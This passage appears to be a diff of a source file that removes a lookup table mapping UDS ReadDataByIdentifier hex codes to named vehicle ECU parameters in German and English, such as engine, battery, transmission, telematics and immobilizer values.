-UDS_RDBI.dataIdentifiers[0x1024] = "CALID DCB READ" -UDS_RDBI.dataIdentifiers[0x102d] = "Warntongeber" -UDS_RDBI.dataIdentifiers[0x102e] = "Kontrollschalter" -UDS_RDBI.dataIdentifiers[0x102f] = "Kontrollschalter" -UDS_RDBI.dataIdentifiers[0x1030] = "CVN OBCH" -UDS_RDBI.dataIdentifiers[0x1031] = "CVN HVAC" -UDS_RDBI.dataIdentifiers[0x1032] = "CVN DCDC48" -UDS_RDBI.dataIdentifiers[0x1033] = "CVN LISB48" -UDS_RDBI.dataIdentifiers[0x1034] = "CVN DCB READ" -UDS_RDBI.dataIdentifiers[0x1050] = "PNDS Counter" -UDS_RDBI.dataIdentifiers[0x1051] = "IOD CurrRead" -UDS_RDBI.dataIdentifiers[0x1052] = "BatChangeRead" -UDS_RDBI.dataIdentifiers[0x1053] = "BSBFltRead" -UDS_RDBI.dataIdentifiers[0x1054] = "ChargeBalance" -UDS_RDBI.dataIdentifiers[0x1055] = "DDP" -UDS_RDBI.dataIdentifiers[0x1056] = "Prod TraMode State" -UDS_RDBI.dataIdentifiers[0x1058] = "CurrentTrace" -UDS_RDBI.dataIdentifiers[0x1059] = "CycleLog" -UDS_RDBI.dataIdentifiers[0x105a] = "CycleLog Additional" -UDS_RDBI.dataIdentifiers[0x105b] = "PNDS WarmData" -UDS_RDBI.dataIdentifiers[0x105c] = "PNDS ColdData" -UDS_RDBI.dataIdentifiers[0x1080] = "OMC Parameters" -UDS_RDBI.dataIdentifiers[0x1081] = "BCM Parameters" -UDS_RDBI.dataIdentifiers[0x1082] = "BCD Parameters" -UDS_RDBI.dataIdentifiers[0x1083] = "BSI Parameters" -UDS_RDBI.dataIdentifiers[0x1084] = "BSB Parameters" -UDS_RDBI.dataIdentifiers[0x1085] = "ICC Parameters" -UDS_RDBI.dataIdentifiers[0x1086] = "SSM Parameters" -UDS_RDBI.dataIdentifiers[0x1087] = "DDP Parameters" -UDS_RDBI.dataIdentifiers[0x1088] = "FOTA Parameters" -UDS_RDBI.dataIdentifiers[0x1089] = "DLM Parameters" -UDS_RDBI.dataIdentifiers[0x108a] = "Prod and Service Parameters" -UDS_RDBI.dataIdentifiers[0x108b] = "PNDS Parameters" -UDS_RDBI.dataIdentifiers[0x108c] = "ISP Parameters" -UDS_RDBI.dataIdentifiers[0x108d] = "OSP Parameters" -UDS_RDBI.dataIdentifiers[0x108e] = "HW Parameters" -UDS_RDBI.dataIdentifiers[0x1100] = "Progammstandskennung Build" -UDS_RDBI.dataIdentifiers[0x1101] = "uBN TrackingRegister BE Block" -UDS_RDBI.dataIdentifiers[0x1102] = "uBN TrackingRegister BE Block" -UDS_RDBI.dataIdentifiers[0x1103] = "uBN TrackingRegister BE Block 4" -UDS_RDBI.dataIdentifiers[0x1104] = "uBN TrackingRegister BE Block 5" -UDS_RDBI.dataIdentifiers[0x1110] = "uBN TrackingRegister MonPhase" -UDS_RDBI.dataIdentifiers[0x1120] = "uBN Error Data Register" -UDS_RDBI.dataIdentifiers[0x1122] = "HV Bus Open Fault Enabler" -UDS_RDBI.dataIdentifiers[0x1123] = "Manufacturing Boost Mode Enable Command DCX" -UDS_RDBI.dataIdentifiers[0x1124] = "Boost Mode Enable Failure History DCX" # or Hybrid Battery Pump Control Enable" -UDS_RDBI.dataIdentifiers[0x1125] = "Operation Mode DCX" -UDS_RDBI.dataIdentifiers[0x1130] = "uBN Konfiguration VCD" -UDS_RDBI.dataIdentifiers[0x1131] = "uBN Zaehler" -UDS_RDBI.dataIdentifiers[0x1141] = "Run/Crank Voltage" -UDS_RDBI.dataIdentifiers[0x11a1] = "Engine Run Time" -UDS_RDBI.dataIdentifiers[0x1200] = "Oeldatensatz Grunddaten" -UDS_RDBI.dataIdentifiers[0x1201] = "Oeldatensatz Grunddaten 2" -UDS_RDBI.dataIdentifiers[0x1202] = "Oeldatensatz Warnung" -UDS_RDBI.dataIdentifiers[0x1203] = "Oeldatensatz Warnung 2" -UDS_RDBI.dataIdentifiers[0x1204] = "Oeldatensatz Oelstandsabfrage" -UDS_RDBI.dataIdentifiers[0x1205] = "Oeldatensatz Nachfuellerkennung" -UDS_RDBI.dataIdentifiers[0x1206] = "Oeldatensatz variabel" -UDS_RDBI.dataIdentifiers[0x1232] = "Emissions Warm-Up Counter" -UDS_RDBI.dataIdentifiers[0x1233] = "Non Emissions Warm-Up Counter" -UDS_RDBI.dataIdentifiers[0x1234] = "Mileage Distance Since Code Clear 2Byte" -UDS_RDBI.dataIdentifiers[0x12de] = "Main Processor Reset Source" -UDS_RDBI.dataIdentifiers[0x12e7] = "Main Processor Running Reset Source Address" -UDS_RDBI.dataIdentifiers[0x1940] = "Transmission Oil Temperature" -UDS_RDBI.dataIdentifiers[0x1942] = "Transmission Output Speed" -UDS_RDBI.dataIdentifiers[0x194f] = "Transmission PRND Range" -UDS_RDBI.dataIdentifiers[0x1951] = "Transmission Range Input" -UDS_RDBI.dataIdentifiers[0x195d] = "Transfer Case Ratio" -UDS_RDBI.dataIdentifiers[0x197e] = "Transmission Tap Up/Down" -UDS_RDBI.dataIdentifiers[0x19a1] = "Transmission Gear Ratio" -UDS_RDBI.dataIdentifiers[0x1a22] = "Cumulative Charge AmpHours" -UDS_RDBI.dataIdentifiers[0x1a23] = "Cumulative DisCharge AmpHours" -UDS_RDBI.dataIdentifiers[0x1a2d] = "Engine Actual Steady State Torque" -UDS_RDBI.dataIdentifiers[0x1a31] = "LifeTime Number Of Opens" -UDS_RDBI.dataIdentifiers[0x1a32] = "LifeTime Number Of Closes" -UDS_RDBI.dataIdentifiers[0x1a33] = "LifeTime Number Of Opens Under Load" -UDS_RDBI.dataIdentifiers[0x1a34] = "LifeTime Number Of Impending Opens" -UDS_RDBI.dataIdentifiers[0x1a35] = "LifeTime Number Of Open Requests" -UDS_RDBI.dataIdentifiers[0x1a36] = "LifeTime Number of loss 12V" -UDS_RDBI.dataIdentifiers[0x1a37] = "LifeTime Number of PreCharge" -UDS_RDBI.dataIdentifiers[0x1a9c] = "Engineering Software number" -UDS_RDBI.dataIdentifiers[0x1a9d] = "Vehicle Kilometers" -UDS_RDBI.dataIdentifiers[0x1a9f] = "Shipped Packs" -UDS_RDBI.dataIdentifiers[0x1b01] = "HV SOC History" -UDS_RDBI.dataIdentifiers[0x1b02] = "HV SOC History" -UDS_RDBI.dataIdentifiers[0x1b03] = "HV SOC History" -UDS_RDBI.dataIdentifiers[0x1b04] = "HV SOC History 4" -UDS_RDBI.dataIdentifiers[0x1b05] = "HV SOC History 5" -UDS_RDBI.dataIdentifiers[0x1b06] = "HV SOC Time Stats" -UDS_RDBI.dataIdentifiers[0x1b07] = "HV Voltage Time Stats" -UDS_RDBI.dataIdentifiers[0x1b08] = "HV Temperature Time Stats" -UDS_RDBI.dataIdentifiers[0x1b09] = "HV Battery Voltage Exceeded" -UDS_RDBI.dataIdentifiers[0x1b11] = "HV Module Volt Differentials Time Stats" -UDS_RDBI.dataIdentifiers[0x1b12] = "HV Module Temperature Differentials Time Stats" -UDS_RDBI.dataIdentifiers[0x1b14] = "HV SOC History 0" -UDS_RDBI.dataIdentifiers[0x1b15] = "HV Coolant Temperature Differentials Time Stats" -UDS_RDBI.dataIdentifiers[0x1b16] = "HV Current Time Stats" -UDS_RDBI.dataIdentifiers[0x1b17] = "Resistance Histogram" -UDS_RDBI.dataIdentifiers[0x1c20] = "Low Voltage Circuit Temperature" -UDS_RDBI.dataIdentifiers[0x1c23] = "APM Heat Plate Temperature" -UDS_RDBI.dataIdentifiers[0x1c24] = "HCP High Voltage Circuit Voltage" -UDS_RDBI.dataIdentifiers[0x1c25] = "APM High Voltage Circuit Current" -UDS_RDBI.dataIdentifiers[0x1c26] = "MCPA IGBT Module Temperature" -UDS_RDBI.dataIdentifiers[0x1c27] = "MCPB IGBT Module Temperature" -UDS_RDBI.dataIdentifiers[0x1c28] = "MCPA IGBT Module Temperature" -UDS_RDBI.dataIdentifiers[0x1c29] = "MCPB IGBT Module Temperature" -UDS_RDBI.dataIdentifiers[0x1c2a] = "MCPA IGBT Module Temperature" -UDS_RDBI.dataIdentifiers[0x1c2b] = "MCPB IGBT Module Temperature" -UDS_RDBI.dataIdentifiers[0x1c2c] = "Low Voltage Circuit" -UDS_RDBI.dataIdentifiers[0x1c2e] = "High Voltage" -UDS_RDBI.dataIdentifiers[0x1c2f] = "Maximum Hybrid Battery Module Voltage" -UDS_RDBI.dataIdentifiers[0x1c30] = "Minimum Hybrid Battery Module Voltage" -UDS_RDBI.dataIdentifiers[0x1c31] = "APM Power Loss" -UDS_RDBI.dataIdentifiers[0x1c32] = "Contactor Commanded PWM" -UDS_RDBI.dataIdentifiers[0x1c36] = "Low Voltage Circuit Current" -UDS_RDBI.dataIdentifiers[0x1c37] = "Low Voltage Circuit Voltage" -UDS_RDBI.dataIdentifiers[0x1c38] = "Voltage Output Set Point Duty Cycle Command" -UDS_RDBI.dataIdentifiers[0x1c39] = "Accessory Power Module Functional" -UDS_RDBI.dataIdentifiers[0x1c45] = "Motor A Mid-Pack Voltage" -UDS_RDBI.dataIdentifiers[0x1c46] = "Motor B Mid-Pack Voltage" -UDS_RDBI.dataIdentifiers[0x1ce0] = "Rate Limiter Configuration" -UDS_RDBI.dataIdentifiers[0x1f01] = "Mesurement ID Control" -UDS_RDBI.dataIdentifiers[0x1f02] = "Enable/Disable ALS" -UDS_RDBI.dataIdentifiers[0x1f04] = "Variant coding - actual status" -UDS_RDBI.dataIdentifiers[0x1f08] = "Variant coding - Compatible variants" -UDS_RDBI.dataIdentifiers[0x1fb1] = "KG Versorgungsspannung Ist Wert Versorgungsspannung" -UDS_RDBI.dataIdentifiers[0x1fc0] = "KG Geraeteparameter" -UDS_RDBI.dataIdentifiers[0x1fc1] = "Status Tuer" -UDS_RDBI.dataIdentifiers[0x1fc2] = "KG Diagnosespannung HF Ausgang Spannung Diagnoseeingang HF" -UDS_RDBI.dataIdentifiers[0x1fd0] = "Eingangssignale Read" -UDS_RDBI.dataIdentifiers[0x1fd1] = "Tuergrifftelegramme" -UDS_RDBI.dataIdentifiers[0x1fd2] = "KG aktuelle LF Parameter lesen Ortungsfeld hinten" # or KG FZV Zaehler Zaehler, FZV Zaehler Read Response Parameters Zaehler -UDS_RDBI.dataIdentifiers[0x1fd3] = "Batteriespannung Schluessel Read Batteriespannung Schluessel" -UDS_RDBI.dataIdentifiers[0x2000] = "Motordrehzahl Eng Spd" -UDS_RDBI.dataIdentifiers[0x2001] = "Read Stored Switch States" -UDS_RDBI.dataIdentifiers[0x2002] = "Read Actual Switch States" # or Kraftstoffmenge rechts, Registration Status Registration Error -UDS_RDBI.dataIdentifiers[0x2003] = "Vehicle speed" # or Vehicle speed Read Vehicle speed, Kraftstoffmenge links -UDS_RDBI.dataIdentifiers[0x2004] = "Certificate Status Certificate" # or Compatibility, Estimated effective engine torque -UDS_RDBI.dataIdentifiers[0x2005] = "voltage Read Battery voltage" # or Geber Nockenwelle Signal Einlass, Signal Strength BT WiFi BT Signal Strength -UDS_RDBI.dataIdentifiers[0x2006] = "Klopfsensor" # or Klemme87 Rueckmeldeleitung, BT Address BT Adress, Klopfsensor - Klopfen erkannt -UDS_RDBI.dataIdentifiers[0x2007] = "Oil temperature engine Read Oil temperature engine" # or Oil temperature engine, Massentrom aus HFM -UDS_RDBI.dataIdentifiers[0x2008] = "temperature" # or temperature Read Fuel temperature, Spannung O2-Regelsonde Bank 2 Rohwert, TCU Inputs Battery Voltage -UDS_RDBI.dataIdentifiers[0x2009] = "TCU Output ECall LED" # or Atmospheric pressure, Spannung O2-Regelsonde Bank 1 Rohwert -UDS_RDBI.dataIdentifiers[0x200b] = "Accelerator pedal voltage track" -UDS_RDBI.dataIdentifiers[0x200c] = "Cellular Network Signal Information Cell ID" -UDS_RDBI.dataIdentifiers[0x200d] = "TCU Environmental Information Ignition State" # or Pedalwertgeber Versorgungsspannung gesamt, Freon pressure sensor voltage -UDS_RDBI.dataIdentifiers[0x200e] = "WiFi MAC Address Address" # or Key state Read Key state, Pedalwertgeber 1 Sent Counts, Key state -UDS_RDBI.dataIdentifiers[0x200f] = "Pedalwertgeber 2 Sent Counts" # or HU Connectivity Status BT Connection, Brake pedal switches consolidation state -UDS_RDBI.dataIdentifiers[0x2010] = "Engine status Read Engine status" # or Spannung O2-Diagnosesonde Bank 2 Rohwert, SIM Profile Active Profile, Engine status -UDS_RDBI.dataIdentifiers[0x2011] = "BT Address HU" # or Kuehlmitteltemperatur korrigiert, BT Address HU BT Adress -UDS_RDBI.dataIdentifiers[0x2012] = "Pedalwertgeber Versorgungsspannung" # or Spannung O2-Diagnosesonde Bank 1 Rohwert, Sonde Rechts Nach KAT ROH, Atmospheric pressure sensor voltage -UDS_RDBI.dataIdentifiers[0x2013] = "Pedalwertgeber" -UDS_RDBI.dataIdentifiers[0x2014] = "Gangsensor SG Horizontal ROH" # or Camshaft crankshaft synchronization state, Ansauglufttemperatur in HFM bzw. vor DK, Ansauglufttemperatur -UDS_RDBI.dataIdentifiers[0x2015] = "Gangsensor SG Horizontal" -UDS_RDBI.dataIdentifiers[0x2016] = "Gangsensor SG Vertikal" # or Crankshaft synchronization state, Cellular Antenna Switch Status, Cellular Antenna Switch Status Antenna Active -UDS_RDBI.dataIdentifiers[0x2017] = "PremAirkuehlertemperatur" # or Gangsensor SG Fahrstufe -UDS_RDBI.dataIdentifiers[0x2018] = "Cellular Network Numbers MSISDN MDN PRES MSISDN type ASCII 15 byte" # or Cellular Network Numbers EUICC PRES EUICC type ASCII32Byte, Cellular Network Numbers IMSI MIN PRES IMSI type ASCII 15byte, Cellular Network Numbers EUICC, Cellular Network Numbers ICCID PRES ICCID type ASCII22Byte, Cellular Network Numbers IMEI MEID PRES IMEI type ASCII 16Byte -UDS_RDBI.dataIdentifiers[0x2019] = "Tankdruckdifferenz" # or Kupplungspedalsensor -UDS_RDBI.dataIdentifiers[0x201a] = "Kupplungspedalsensor Weg" # or Batteriespannung BATZ, Operating Mode, Operating Mode Operating -UDS_RDBI.dataIdentifiers[0x201b] = "Panic Alarm Configuration PAN MIN INTERMESSAGE TIME" -UDS_RDBI.dataIdentifiers[0x201c] = "Monitool Supervisor status" # or Power Mode Timers DNO Intended Reset, Power Mode Timers, Ansauglufttemperatur im Saugrohr -UDS_RDBI.dataIdentifiers[0x201d] = "Thermoplungers command state" # or Ansauglufttemperatur im Saugrohr Roh, GNSS Position Data DR DateYear -UDS_RDBI.dataIdentifiers[0x201e] = "Air conditioning state" # or Remote Update Setting maxSWDLLmaxIgnitionOffDuration, Tankdruckdifferenz bei DMTL, Remote Update Setting -UDS_RDBI.dataIdentifiers[0x201f] = "Ansauglufttemperatur korrigiert" # or Speed Alert, Speed Alert Notification Interval -UDS_RDBI.dataIdentifiers[0x2020] = "VTA Mature Time atnAlarmThreshold" # or VTA Mature Time, 2021 2040 -UDS_RDBI.dataIdentifiers[0x2021] = "Ansauglufttemperatur in HFM bzw. vor DK Rohwert" -UDS_RDBI.dataIdentifiers[0x2022] = "Batteriespannung ROH ADC Value" # or Read Time of Last Reconcilliation Date of Last Reconciliation day -UDS_RDBI.dataIdentifiers[0x2023] = "Kuehlmitteltemperatur ROH" # or Service Provider Reconciliation, Service Provider Reconciliation Date of Last Reconciliation day -UDS_RDBI.dataIdentifiers[0x2024] = "Idle engine speed setpoint" # or Service Provisioning Authorization State Adapt Authorization, Chiller Temperatur ROH, Service Provisioning Authorization State -UDS_RDBI.dataIdentifiers[0x2025] = "GNSS Time Epoch" # or Brake pedal close active switch state, GNSS Time Epoch Value, Chiller Temperatur, Pedalwertgeber Potentiometer 1 Rohwert -UDS_RDBI.dataIdentifiers[0x2026] = "Brake pedal open active switch state" # or Kuehlmitteltemperatur NT2 Batterie Plugin Hybrid ROH, Cellular Network Current Provider Name Name, Pedalwertgeber Potentiometer 2 Rohwert -UDS_RDBI.dataIdentifiers[0x2027] = "Clutch pedal minimum travel switch state CAN" # or Kuehlmitteltemperatur NT2 Batterie Plugin Hybrid, Saugrohrdruck Rohwert, Saugrohrdruck ROH, Cellular Network Home Provider Name Name -UDS_RDBI.dataIdentifiers[0x2028] = "Tankdruckdifferenz Rohwert" # or Tankdruckdifferenz ROH, Kuehlertemperatur PremAir, MIL lamp request state, LU Part Number Part Number -UDS_RDBI.dataIdentifiers[0x2029] = "Chiller Druck ROH" # or Cellular Network Visible Neighbor Cell Stations Mobile Country Code Nr, Pedalwertgeberstellung -UDS_RDBI.dataIdentifiers[0x202a] = "Chiller Druck" # or Regenerierleitung Druck ROH -UDS_RDBI.dataIdentifiers[0x202b] = "Kuehlertemperatur PremAir SignalQualifier" # or Regenerierleitung Druck -UDS_RDBI.dataIdentifiers[0x202c] = "Chiller Druck ungefiltert" -UDS_RDBI.dataIdentifiers[0x202d] = "Protected state" -UDS_RDBI.dataIdentifiers[0x202e] = "Accelerator pedal position" -UDS_RDBI.dataIdentifiers[0x2030] = "Intake camshaft phaser position setpoint" # or Kuehlmittellevel Niedertemperatur Kreislauf ROH, TCU Internal SW Versions Application NAD -UDS_RDBI.dataIdentifiers[0x2031] = "Kraftstofftemperatur im Tank Rohwert" # or Intake camshaft phaser position -UDS_RDBI.dataIdentifiers[0x2032] = "Secure Mode Debug Interface" # or Intake camshaft phaser position bank, Kraftstofftemperatur im Tank, Tanktemperatur -UDS_RDBI.dataIdentifiers[0x2033] = "Main Processor NVM Fault" # or Intake camshaft phaser PWM command, Secure Mode Get ID Identification Data -UDS_RDBI.dataIdentifiers[0x2034] = "Main Processor RAM Fault Source Address" # or Intake camshaft phaser PWM command bank, Set Secure Mode -UDS_RDBI.dataIdentifiers[0x2035] = "Force Network Generation" # or Force Network Generation Used Network, CCSL Cruise control speed setpoint, Processor ROM Fault Source Address -UDS_RDBI.dataIdentifiers[0x2036] = "Sonde Innenwiderstand Rechts Vor Kat" # or Counter of inconsistencies between accelerator pedal and brake, Innenwiderstand Lambdasonde Bank 1 vor Kat -UDS_RDBI.dataIdentifiers[0x2037] = "Steuergeraete Innentemperatur Rohwert" # or Engine torque without gearbox request -UDS_RDBI.dataIdentifiers[0x2038] = "Steuergeraete Innentemperatur" -UDS_RDBI.dataIdentifiers[0x2039] = "Umgebungsdruck Rohwert" # or CCSL Steering wheel push buttons voltage -UDS_RDBI.dataIdentifiers[0x203a] = "Configuration Cruise control option" -UDS_RDBI.dataIdentifiers[0x203b] = "Configuration Cruise control On Off button" -UDS_RDBI.dataIdentifiers[0x203c] = "Cruise control On Off button state" -UDS_RDBI.dataIdentifiers[0x203d] = "Configuration Speed limiter option" -UDS_RDBI.dataIdentifiers[0x203e] = "Configuration Speed limiter On Off button" -UDS_RDBI.dataIdentifiers[0x203f] = "Speed limiter On Off button state" -UDS_RDBI.dataIdentifiers[0x2040] = "2041 2060" -UDS_RDBI.dataIdentifiers[0x2041] = "Pedalwertgeber 50% der Versorgungsspannung" # or Pedalwertgeber halbe Versorgungsspannung, Spannungsversorgung Sensorik, Configuration CCSL steering wheel push buttons -UDS_RDBI.dataIdentifiers[0x2042] = "Configuration Air conditioning control unit" # or Abgasklappe Temperatur -UDS_RDBI.dataIdentifiers[0x2043] = "Ladelufttemperatur" # or Configuration Freon pressure sensor -UDS_RDBI.dataIdentifiers[0x2044] = "Ladeluft Solltemperatur" # or Periodendauer Korrektursignal HFM, Powertrain setpoint -UDS_RDBI.dataIdentifiers[0x2045] = "Offset-Spannung Drucksensor Saugrohr" # or Kuelkreislauf HV Temperatur NT2, Clutch pedal maximum travel switch state -UDS_RDBI.dataIdentifiers[0x2046] = "Sonde Vor Kat Lambda" # or Kuehlkreislauf2 Niedertemperatur BMS ROH -UDS_RDBI.dataIdentifiers[0x2047] = "Chiller Temperatur Gradient" -UDS_RDBI.dataIdentifiers[0x2048] = "Cranking autorisation status" # or Temperatur Median Kaltstart -UDS_RDBI.dataIdentifiers[0x2049] = "ADC-Spannung Lambdasonde hinter Kat rechte" # or Sonde ADC Spannung Rechts Nach Kat -UDS_RDBI.dataIdentifiers[0x204a] = "Motor fans requests" # or Main Processor Total Running Resets -UDS_RDBI.dataIdentifiers[0x204b] = "CCSL Steering wheel push buttons state" # or Main Processor Maximum Running Resets Between Power-up Resets -UDS_RDBI.dataIdentifiers[0x204c] = "Sonde Nach Kat Innenwiderstand" # or CCSL -UDS_RDBI.dataIdentifiers[0x204d] = "CCSL State of the failures which cause irreversible CC safety failure" -UDS_RDBI.dataIdentifiers[0x204e] = "CCSL State of the reversible failures not due to CCSL which cause CCSL failure" # or Sonde Vor Kat Heizungsspannung -UDS_RDBI.dataIdentifiers[0x204f] = "CCSL State of the reversible failures not due to CC which cause CC failure" -UDS_RDBI.dataIdentifiers[0x2050] = "Displayed vehicle speed received on the CAN network" -UDS_RDBI.dataIdentifiers[0x2051] = "Displayed vehicle speed unit" -UDS_RDBI.dataIdentifiers[0x2053] = "ADC-Spannung Ansauglufttemperatur" -UDS_RDBI.dataIdentifiers[0x2057] = "Alternator power Read Alternator power" -UDS_RDBI.dataIdentifiers[0x2059] = "Clutch pedal minimum travel switch state wire" -UDS_RDBI.dataIdentifiers[0x205a] = "Idle engine speed regulation status" -UDS_RDBI.dataIdentifiers[0x205b] = "Limp home activation state" -UDS_RDBI.dataIdentifiers[0x205c] = "OBD readiness codes status" -UDS_RDBI.dataIdentifiers[0x205d] = "No driver request state pedal CCSL" -UDS_RDBI.dataIdentifiers[0x205f] = "Requested idle speed setpoint for LCV s accessories" -UDS_RDBI.dataIdentifiers[0x2060] = "2061 2080" -UDS_RDBI.dataIdentifiers[0x2061] = "Effective engine torque target requested by real pedal and virtual ACC CC SL drivers" # or Temperatursensor Niedertemperatur Kreislauf Rohwert -UDS_RDBI.dataIdentifiers[0x2062] = "ADC-Spannung Lambdasonde hinter Kat linke" # or Effective engine torque setpoint requested by real pedal and virtual ACC CC SL drivers -UDS_RDBI.dataIdentifiers[0x2063] = "Minimum engine torque" # or Temperatursensor Niedertemperatur Kreislauf -UDS_RDBI.dataIdentifiers[0x2064] = "Maximum engine torque" -UDS_RDBI.dataIdentifiers[0x2065] = "Maximum engine torque with dynamic limitations" -UDS_RDBI.dataIdentifiers[0x2066] = "Engine torque losses" -UDS_RDBI.dataIdentifiers[0x2067] = "Final indicated torque raw" -UDS_RDBI.dataIdentifiers[0x2068] = "Final indicated torque target" -UDS_RDBI.dataIdentifiers[0x2069] = "Final indicated torque setpoint" -UDS_RDBI.dataIdentifiers[0x206a] = "Brake pedal duration of the close active switch blocked" -UDS_RDBI.dataIdentifiers[0x206b] = "Brake pedal duration of the open active switch blocked" -UDS_RDBI.dataIdentifiers[0x206d] = "Configuration Clutch pedal minimum travel switch" -UDS_RDBI.dataIdentifiers[0x206e] = "Configuration Brake pedal open active switch" -UDS_RDBI.dataIdentifiers[0x206f] = "Synthesis of engine stop requests" -UDS_RDBI.dataIdentifiers[0x2070] = "Immobilizer diagnosis availability" -UDS_RDBI.dataIdentifiers[0x2071] = "Immobilizer Byte 1 used to allow diagnosis" -UDS_RDBI.dataIdentifiers[0x2072] = "Immobilizer Byte 2 used to allow diagnosis" -UDS_RDBI.dataIdentifiers[0x2073] = "Immobilizer Byte 3 used to allow diagnosis" # or Kraftstofftemperatur Niederdruck -UDS_RDBI.dataIdentifiers[0x2074] = "Immobilizer engine not running due to ECM" -UDS_RDBI.dataIdentifiers[0x2075] = "Immobilizer engine not running due to BCM in secure mode" -UDS_RDBI.dataIdentifiers[0x2076] = "Ladedruck ROH" # or Immobilizer engine not running due to no BCM authorization -UDS_RDBI.dataIdentifiers[0x2077] = "Ladedruck" # or Immobilizer engine not running due to a CAN network problem with the BCM -UDS_RDBI.dataIdentifiers[0x2078] = "CCSL State of the causes for normal CCSL deactivation" -UDS_RDBI.dataIdentifiers[0x2079] = "CCSL State of the system causes for normal CCSL deactivation" -UDS_RDBI.dataIdentifiers[0x207a] = "Ladedruck korrigiert" # or Maximum duration of resume button pressed -UDS_RDBI.dataIdentifiers[0x207b] = "Maximum duration of set button pressed" -UDS_RDBI.dataIdentifiers[0x207c] = "Maximum duration of set button pressed" -UDS_RDBI.dataIdentifiers[0x207d] = "Maximum duration of suspend button pressed" -UDS_RDBI.dataIdentifiers[0x207e] = "Maximum value of blocked button detection counter" -UDS_RDBI.dataIdentifiers[0x207f] = "Starter fault" -UDS_RDBI.dataIdentifiers[0x2080] = "2081 20A0" -UDS_RDBI.dataIdentifiers[0x2081] = "Configuration AGB automatic gearbox" -UDS_RDBI.dataIdentifiers[0x2082] = "Sondenheizung Nach Kat angesteuert" -UDS_RDBI.dataIdentifiers[0x2083] = "Configuration SDL speed and distance limiter" -UDS_RDBI.dataIdentifiers[0x2084] = "Configuration USM underhood switching module" # or Sonde Nach KAT Lambda -UDS_RDBI.dataIdentifiers[0x2085] = "Configuration BCM body control module" -UDS_RDBI.dataIdentifiers[0x2086] = "Configuration GCU gas control unit" # or Sonde Nach Kat Bereitschaft -UDS_RDBI.dataIdentifiers[0x2087] = "Configuration Cluster control unit" -UDS_RDBI.dataIdentifiers[0x2088] = "Configuration ABS ESP" -UDS_RDBI.dataIdentifiers[0x2089] = "Configuration SWA steering wheel angle" -UDS_RDBI.dataIdentifiers[0x208a] = "Configuration DDCM driver door control module" -UDS_RDBI.dataIdentifiers[0x208c] = "Maximum duration of ASCD button press" -UDS_RDBI.dataIdentifiers[0x208d] = "Detection of option presence enabled" -UDS_RDBI.dataIdentifiers[0x208e] = "gear engaged 01" -UDS_RDBI.dataIdentifiers[0x208f] = "Anticipated gear engaged" -UDS_RDBI.dataIdentifiers[0x2090] = "Sonde Nach Kat Taupunkt Erreicht" # or Coherent airbag crash frame detection -UDS_RDBI.dataIdentifiers[0x2091] = "Coherent airbag crash frame memorization" -UDS_RDBI.dataIdentifiers[0x2092] = "Air conditioning request" -UDS_RDBI.dataIdentifiers[0x2093] = "Test under pressure of the climatisation circuit" -UDS_RDBI.dataIdentifiers[0x2094] = "Combination of all vehicle air conditioning compressor inhibitions" -UDS_RDBI.dataIdentifiers[0x2095] = "Combination of all engine air conditioning compressor inhibitions" -UDS_RDBI.dataIdentifiers[0x2096] = "Automatic gearbox cranking authorization" -UDS_RDBI.dataIdentifiers[0x2097] = "Automatic gearbox cranking authorization via ECM" -UDS_RDBI.dataIdentifiers[0x2098] = "Accelerated idle speed requested by air conditioning" -UDS_RDBI.dataIdentifiers[0x2099] = "Alternator load" -UDS_RDBI.dataIdentifiers[0x209a] = "Adaptative correction of the idle engine speed regulator" -UDS_RDBI.dataIdentifiers[0x209b] = "Configuration Accessories idle engine speed strategy" -UDS_RDBI.dataIdentifiers[0x209d] = "Electric balance counter" -UDS_RDBI.dataIdentifiers[0x20a0] = "20A1 20C0" -UDS_RDBI.dataIdentifiers[0x20a3] = "Brake pedal states received on the CAN" -UDS_RDBI.dataIdentifiers[0x20a4] = "Sensors power supply 4 voltage raw acquisition" -UDS_RDBI.dataIdentifiers[0x20a5] = "Travelled distance in road and highway from the last oil drain" -UDS_RDBI.dataIdentifiers[0x20a6] = "Travelled distance in depollution zone from the last oil drain" -UDS_RDBI.dataIdentifiers[0x20a8] = "Oil soot rate max model" -UDS_RDBI.dataIdentifiers[0x20a9] = "Total time in richness 1 mode" -UDS_RDBI.dataIdentifiers[0x20aa] = "Mastervac vacuum pressure by sensor" -UDS_RDBI.dataIdentifiers[0x20ab] = "Brake vacuum status received on the CAN" -UDS_RDBI.dataIdentifiers[0x20ac] = "Mastervac vacuum pressure by sensor validity status" -UDS_RDBI.dataIdentifiers[0x20ad] = "Activation request of mastervac diagnosis sequence vacuum pump and analog sensor" -UDS_RDBI.dataIdentifiers[0x20b3] = "StopAuto forbidden by HV network" -UDS_RDBI.dataIdentifiers[0x20b4] = "DCDC activation required by Electrical Energy Management" -UDS_RDBI.dataIdentifiers[0x20b5] = "DCDC Input Current taken on high voltage network send by CAN" -UDS_RDBI.dataIdentifiers[0x20b6] = "DCDC Voltage on High Voltage Network send by CAN" -UDS_RDBI.dataIdentifiers[0x20b7] = "Low voltage power supply current supply by DCDC send by CAN" -UDS_RDBI.dataIdentifiers[0x20b8] = "Maximum current available by system on low voltage power supply send by CAN" -UDS_RDBI.dataIdentifiers[0x20b9] = "DCDC Fault type from CAN" -UDS_RDBI.dataIdentifiers[0x20ba] = "DCDC state send by CAN network" -UDS_RDBI.dataIdentifiers[0x20bc] = "Stop auto forbidden" -UDS_RDBI.dataIdentifiers[0x20bd] = "Electrical Energy Management Stop and Start type" -UDS_RDBI.dataIdentifiers[0x20c0] = "20C1 20E0" -UDS_RDBI.dataIdentifiers[0x20c3] = "Request of update concerning Vxx eng last cge km Vehicle distance at last engine change following a change of engine " -UDS_RDBI.dataIdentifiers[0x20c4] = "Raw boost pressure from sensor" -UDS_RDBI.dataIdentifiers[0x20c6] = "Raw acquisition of the boost pressure" -UDS_RDBI.dataIdentifiers[0x20c8] = "Gas pressure Manifold level" -UDS_RDBI.dataIdentifiers[0x20c9] = "Injected LPG mass setpoint disrigarding sylinder wall wetting to be added" -UDS_RDBI.dataIdentifiers[0x20ca] = "Bench mode to apply default on upstream O2 sensor richness signal for OBD needs" -UDS_RDBI.dataIdentifiers[0x20cb] = "Variable memorized in EEPROM to configure the THP scheduler activation" -UDS_RDBI.dataIdentifiers[0x20cc] = "4 of the 5 zones engine learned 01" -UDS_RDBI.dataIdentifiers[0x20cd] = "Boolean indicating than offset correction is currently on learning" -UDS_RDBI.dataIdentifiers[0x20ce] = "Mean adaptation factor on injection time for binary sensor" -UDS_RDBI.dataIdentifiers[0x20cf] = "Mean adaptation offset on injection time for binary sensor" -UDS_RDBI.dataIdentifiers[0x20d0] = "Raw adaptation factor on injection time with proportionnal upstream O2 